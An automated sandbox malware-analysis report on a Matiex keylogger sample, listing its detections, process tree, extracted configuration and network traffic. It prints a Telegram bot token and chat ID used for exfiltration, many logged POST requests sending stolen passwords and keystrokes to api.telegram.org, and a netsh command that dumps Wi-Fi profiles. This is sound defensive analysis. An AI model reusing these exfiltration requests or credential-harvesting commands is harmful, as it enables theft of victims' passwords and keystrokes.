Loading ...

Play interactive tourEdit tour

Windows Analysis Report LbmGlrja1Z.exe

Overview

General Information

Sample Name:LbmGlrja1Z.exe
Analysis ID:501032
MD5:a97d3b60df53982ebe6b6927e220f555
SHA1:6c2a5583629099bfb87903655c7fd5113a0b14bb
SHA256:6e039c725ce804c6aae1d4d56d11802a125895bf71bf99e293ec333b91cbc73b
Tags:exeMatiex
Infos:

Most interesting Screenshot:

Detection

Matiex
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Yara detected Matiex Keylogger
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Antivirus / Scanner detection for submitted sample
Uses netsh to modify the Windows network and firewall settings
Tries to harvest and steal ftp login credentials
Uses the Telegram API (likely for C&C communication)
Tries to harvest and steal WLAN passwords
Machine Learning detection for sample
Yara detected Beds Obfuscator
May check the online IP address of the machine
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
Detected potential crypto function
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Uses insecure TLS / SSL version for HTTPS connection
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Classification

Process Tree

  • System is w10x64
  • LbmGlrja1Z.exe (PID: 3888 cmdline: 'C:\Users\user\Desktop\LbmGlrja1Z.exe' MD5: A97D3B60DF53982EBE6B6927E220F555)
    • netsh.exe (PID: 6832 cmdline: 'netsh' wlan show profile MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
      • conhost.exe (PID: 6844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: Matiex

{"Exfil Mode": "Telegram", "Telegram Token": "2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8", "Telegram ID": "1639898258"}

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
LbmGlrja1Z.exeJoeSecurity_MatiexYara detected Matiex KeyloggerJoe Security
    LbmGlrja1Z.exeJoeSecurity_BedsObfuscatorYara detected Beds ObfuscatorJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000002.701896966.0000000000D32000.00000002.00020000.sdmpJoeSecurity_MatiexYara detected Matiex KeyloggerJoe Security
        00000000.00000002.701896966.0000000000D32000.00000002.00020000.sdmpJoeSecurity_BedsObfuscatorYara detected Beds ObfuscatorJoe Security
          00000000.00000000.345079157.0000000000D32000.00000002.00020000.sdmpJoeSecurity_MatiexYara detected Matiex KeyloggerJoe Security
            00000000.00000000.345079157.0000000000D32000.00000002.00020000.sdmpJoeSecurity_BedsObfuscatorYara detected Beds ObfuscatorJoe Security
              Process Memory Space: LbmGlrja1Z.exe PID: 3888JoeSecurity_BedsObfuscatorYara detected Beds ObfuscatorJoe Security

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                0.0.LbmGlrja1Z.exe.d30000.0.unpackJoeSecurity_MatiexYara detected Matiex KeyloggerJoe Security
                  0.0.LbmGlrja1Z.exe.d30000.0.unpackJoeSecurity_BedsObfuscatorYara detected Beds ObfuscatorJoe Security
                    0.2.LbmGlrja1Z.exe.d522fc.1.raw.unpackJoeSecurity_MatiexYara detected Matiex KeyloggerJoe Security
                      0.2.LbmGlrja1Z.exe.d522fc.1.raw.unpackJoeSecurity_BedsObfuscatorYara detected Beds ObfuscatorJoe Security
                        0.0.LbmGlrja1Z.exe.d522fc.1.raw.unpackJoeSecurity_MatiexYara detected Matiex KeyloggerJoe Security
                          Click to see the 3 entries

                          Sigma Overview

                          Stealing of Sensitive Information:

                          barindex
                          Sigma detected: Capture Wi-Fi passwordShow sources
                          Source: Process startedAuthor: Joe Security: Data: Command: 'netsh' wlan show profile, CommandLine: 'netsh' wlan show profile, CommandLine|base64offset|contains: V, Image: C:\Windows\SysWOW64\netsh.exe, NewProcessName: C:\Windows\SysWOW64\netsh.exe, OriginalFileName: C:\Windows\SysWOW64\netsh.exe, ParentCommandLine: 'C:\Users\user\Desktop\LbmGlrja1Z.exe' , ParentImage: C:\Users\user\Desktop\LbmGlrja1Z.exe, ParentProcessId: 3888, ProcessCommandLine: 'netsh' wlan show profile, ProcessId: 6832

                          Jbx Signature Overview

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection:

                          barindex
                          Found malware configurationShow sources
                          Source: 0.2.LbmGlrja1Z.exe.d30000.0.unpackMalware Configuration Extractor: Matiex {"Exfil Mode": "Telegram", "Telegram Token": "2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8", "Telegram ID": "1639898258"}
                          Multi AV Scanner detection for submitted fileShow sources
                          Source: LbmGlrja1Z.exeMetadefender: Detection: 40%Perma Link
                          Source: LbmGlrja1Z.exeReversingLabs: Detection: 85%
                          Antivirus / Scanner detection for submitted sampleShow sources
                          Source: LbmGlrja1Z.exeAvira: detected
                          Machine Learning detection for sampleShow sources
                          Source: LbmGlrja1Z.exeJoe Sandbox ML: detected
                          Source: 0.2.LbmGlrja1Z.exe.d30000.0.unpackAvira: Label: TR/Redcap.jajcu
                          Source: 0.0.LbmGlrja1Z.exe.d30000.0.unpackAvira: Label: TR/Redcap.jajcu
                          Source: LbmGlrja1Z.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                          Source: unknownHTTPS traffic detected: 172.67.188.154:443 -> 192.168.2.6:49752 version: TLS 1.0
                          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49756 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49857 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49934 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:50605 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:50848 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:51023 version: TLS 1.2
                          Source: LbmGlrja1Z.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                          Source: Binary string: D:\Before FprmT\Document VB project\FireFox Stub\FireFox Stub\obj\Debug\VNXT.pdb source: LbmGlrja1Z.exe
                          Source: Binary string: D:\Before FprmT\Document VB project\FireFox Stub\FireFox Stub\obj\Debug\VNXT.pdbh} source: LbmGlrja1Z.exe

                          Networking:

                          barindex
                          Uses the Telegram API (likely for C&C communication)Show sources
                          Source: unknownDNS query: name: api.telegram.org
                          Source: unknownDNS query: name: api.telegram.org
                          May check the online IP address of the machineShow sources
                          Source: C:\Users\user\Desktop\LbmGlrja1Z.exeDNS query: name: checkip.dyndns.org
                          Source: C:\Users\user\Desktop\LbmGlrja1Z.exeDNS query: name: checkip.dyndns.org
                          Source: C:\Users\user\Desktop\LbmGlrja1Z.exeDNS query: name: checkip.dyndns.org
                          Source: C:\Users\user\Desktop\LbmGlrja1Z.exeDNS query: name: checkip.dyndns.org
                          Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                          Source: global trafficHTTP traffic detected: GET /xml/102.129.143.33 HTTP/1.1Host: freegeoip.appConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /xml/102.129.143.33 HTTP/1.1Host: freegeoip.app
                          Source: global trafficHTTP traffic detected: GET /xml/102.129.143.33 HTTP/1.1Host: freegeoip.app
                          Source: global trafficHTTP traffic detected: POST /bot2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8/sendDocument?chat_id=1639898258&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20Passwords%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98d87cff36e4bHost: api.telegram.orgContent-Length: 840Connection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /bot2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8/sendDocument?chat_id=1639898258&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98d87d1591050Host: api.telegram.orgContent-Length: 756
                          Source: global trafficHTTP traffic detected: POST /bot2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8/sendDocument?chat_id=1639898258&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98d87d169bf1cHost: api.telegram.orgContent-Length: 756
                          Source: global trafficHTTP traffic detected: POST /bot2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8/sendDocument?chat_id=1639898258&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98d87d17f35a0Host: api.telegram.orgContent-Length: 756
                          Source: global trafficHTTP traffic detected: POST /bot2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8/sendDocument?chat_id=1639898258&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98d87d19e3324Host: api.telegram.orgContent-Length: 756
                          Source: global trafficHTTP traffic detected: POST /bot2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8/sendDocument?chat_id=1639898258&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98d87d1b60edbHost: api.telegram.orgContent-Length: 756
                          Source: global trafficHTTP traffic detected: POST /bot2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8/sendDocument?chat_id=1639898258&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98d87d1c45900Host: api.telegram.orgContent-Length: 756
                          Source: global trafficHTTP traffic detected: POST /bot2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8/sendDocument?chat_id=1639898258&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98d87d1d2a8bdHost: api.telegram.orgContent-Length: 756
                          Source: global trafficHTTP traffic detected: POST /bot2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8/sendDocument?chat_id=1639898258&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98d87d1ea7e70Host: api.telegram.orgContent-Length: 756
                          Source: global trafficHTTP traffic detected: POST /bot2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8/sendDocument?chat_id=1639898258&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98d87d1f8cce7Host: api.telegram.orgContent-Length: 756
                          Source: global trafficHTTP traffic detected: POST /bot2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8/sendDocument?chat_id=1639898258&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98d87d2097c69Host: api.telegram.orgContent-Length: 756
                          Source: global trafficHTTP traffic detected: POST /bot2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8/sendDocument?chat_id=1639898258&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98d87d21ef2b5Host: api.telegram.orgContent-Length: 756
                          Source: global trafficHTTP traffic detected: POST /bot2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8/sendDocument?chat_id=1639898258&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98d87d22fa216Host: api.telegram.orgContent-Length: 756
                          Source: global trafficHTTP traffic detected: POST /bot2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8/sendDocument?chat_id=1639898258&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98d87d2451837Host: api.telegram.orgContent-Length: 756
                          Source: global trafficHTTP traffic detected: POST /bot2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8/sendDocument?chat_id=1639898258&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98d87d255c80dHost: api.telegram.orgContent-Length: 756
                          Source: global trafficHTTP traffic detected: POST /bot2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8/sendDocument?chat_id=1639898258&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98d87d26415c9Host: api.telegram.orgContent-Length: 756
                          Source: global trafficHTTP traffic detected: POST /bot2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8/sendDocument?chat_id=1639898258&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98d87d274c5bbHost: api.telegram.orgContent-Length: 756
                          Source: global trafficHTTP traffic detected: POST /bot2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8/sendDocument?chat_id=1639898258&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98d87d28a3b2cHost: api.telegram.orgContent-Length: 756
                          Source: global trafficHTTP traffic detected: POST /bot2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8/sendDocument?chat_id=1639898258&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98d87d29aebf0Host: api.telegram.orgContent-Length: 756
                          Source: global trafficHTTP traffic detected: POST /bot2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8/sendDocument?chat_id=1639898258&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98d87d2a939d6Host: api.telegram.orgContent-Length: 756
                          Source: global trafficHTTP traffic detected: POST /bot2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8/sendDocument?chat_id=1639898258&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98d87d2b78a52Host: api.telegram.orgContent-Length: 756
                          Source: global trafficHTTP traffic detected: POST /bot2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8/sendDocument?chat_id=1639898258&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98d87d2cf5f95Host: api.telegram.orgContent-Length: 756
                          Source: global trafficHTTP traffic detected: POST /bot2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8/sendDocument?chat_id=1639898258&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98d87d2e736cfHost: api.telegram.orgContent-Length: 756
                          Source: global trafficHTTP traffic detected: POST /bot2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8/sendDocument?chat_id=1639898258&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98d87d2f5850dHost: api.telegram.orgContent-Length: 756
                          Source: global trafficHTTP traffic detected: POST /bot2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8/sendDocument?chat_id=1639898258&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98d87d303d38dHost: api.telegram.orgContent-Length: 756
                          Source: global trafficHTTP traffic detected: POST /bot2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8/sendDocument?chat_id=1639898258&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98d87d31babd2Host: api.telegram.orgContent-Length: 756
                          Source: global trafficHTTP traffic detected: POST /bot2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8/sendDocument?chat_id=1639898258&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98d87d329faa6Host: api.telegram.orgContent-Length: 756
                          Source: global trafficHTTP traffic detected: POST /bot2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8/sendDocument?chat_id=1639898258&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98d87d341d0b7Host: api.telegram.orgContent-Length: 756
                          Source: global trafficHTTP traffic detected: POST /bot2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8/sendDocument?chat_id=1639898258&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98d87d3502058Host: api.telegram.orgContent-Length: 756
                          Source: global trafficHTTP traffic detected: POST /bot2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8/sendDocument?chat_id=1639898258&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98d87d360cecbHost: api.telegram.orgContent-Length: 756
                          Source: global trafficHTTP traffic detected: POST /bot2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8/sendDocument?chat_id=1639898258&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98d87d3764516Host: api.telegram.orgContent-Length: 756
                          Source: global trafficHTTP traffic detected: POST /bot2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8/sendDocument?chat_id=1639898258&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98d87d386f410Host: api.telegram.orgContent-Length: 756
                          Source: global trafficHTTP traffic detected: POST /bot2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8/sendDocument?chat_id=1639898258&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98d87d39c6b94Host: api.telegram.orgContent-Length: 756
                          Source: global trafficHTTP traffic detected: POST /bot2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8/sendDocument?chat_id=1639898258&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98d87d3ad1a28Host: api.telegram.orgContent-Length: 756
                          Source: global trafficHTTP traffic detected: POST /bot2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8/sendDocument?chat_id=1639898258&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98d87d3c2927eHost: api.telegram.orgContent-Length: 756
                          Source: global trafficHTTP traffic detected: POST /bot2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8/sendDocument?chat_id=1639898258&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98d87d3d34149Host: api.telegram.orgContent-Length: 756
                          Source: global trafficHTTP traffic detected: POST /bot2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8/sendDocument?chat_id=1639898258&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98d87d3f23eabHost: api.telegram.orgContent-Length: 756
                          Source: global trafficHTTP traffic detected: POST /bot2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8/sendDocument?chat_id=1639898258&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98d87d407b337Host: api.telegram.orgContent-Length: 756
                          Source: global trafficHTTP traffic detected: POST /bot2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8/sendDocument?chat_id=1639898258&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98d87d4186360Host: api.telegram.orgContent-Length: 756
                          Source: global trafficHTTP traffic detected: POST /bot2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8/sendDocument?chat_id=1639898258&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98d87d42dd9bfHost: api.telegram.orgContent-Length: 756
                          Source: global trafficHTTP traffic detected: POST /bot2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8/sendDocument?chat_id=1639898258&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98d87d43e890eHost: api.telegram.orgContent-Length: 756
                          Source: global trafficHTTP traffic detected: POST /bot2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8/sendDocument?chat_id=1639898258&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98d87d44cd75fHost: api.telegram.orgContent-Length: 756
                          Source: global trafficHTTP traffic detected: POST /bot2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8/sendDocument?chat_id=1639898258&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98d87d464b197Host: api.telegram.orgContent-Length: 756
                          Source: global trafficHTTP traffic detected: POST /bot2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8/sendDocument?chat_id=1639898258&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98d87d472fc6dHost: api.telegram.orgContent-Length: 756
                          Source: global trafficHTTP traffic detected: POST /bot2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8/sendDocument?chat_id=1639898258&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98d87d4814bd6Host: api.telegram.orgContent-Length: 756
                          Source: global trafficHTTP traffic detected: POST /bot2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8/sendDocument?chat_id=1639898258&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98d87d4992298Host: api.telegram.orgContent-Length: 756
                          Source: global trafficHTTP traffic detected: POST /bot2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8/sendDocument?chat_id=1639898258&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98d87d4a7720aHost: api.telegram.orgContent-Length: 756
                          Source: global trafficHTTP traffic detected: POST /bot2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8/sendDocument?chat_id=1639898258&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98d87d4b8209eHost: api.telegram.orgContent-Length: 756
                          Source: global trafficHTTP traffic detected: POST /bot2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8/sendDocument?chat_id=1639898258&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98d87d4cd96f8Host: api.telegram.orgContent-Length: 756
                          Source: global trafficHTTP traffic detected: POST /bot2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8/sendDocument?chat_id=1639898258&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98d87d4de47eaHost: api.telegram.orgContent-Length: 756
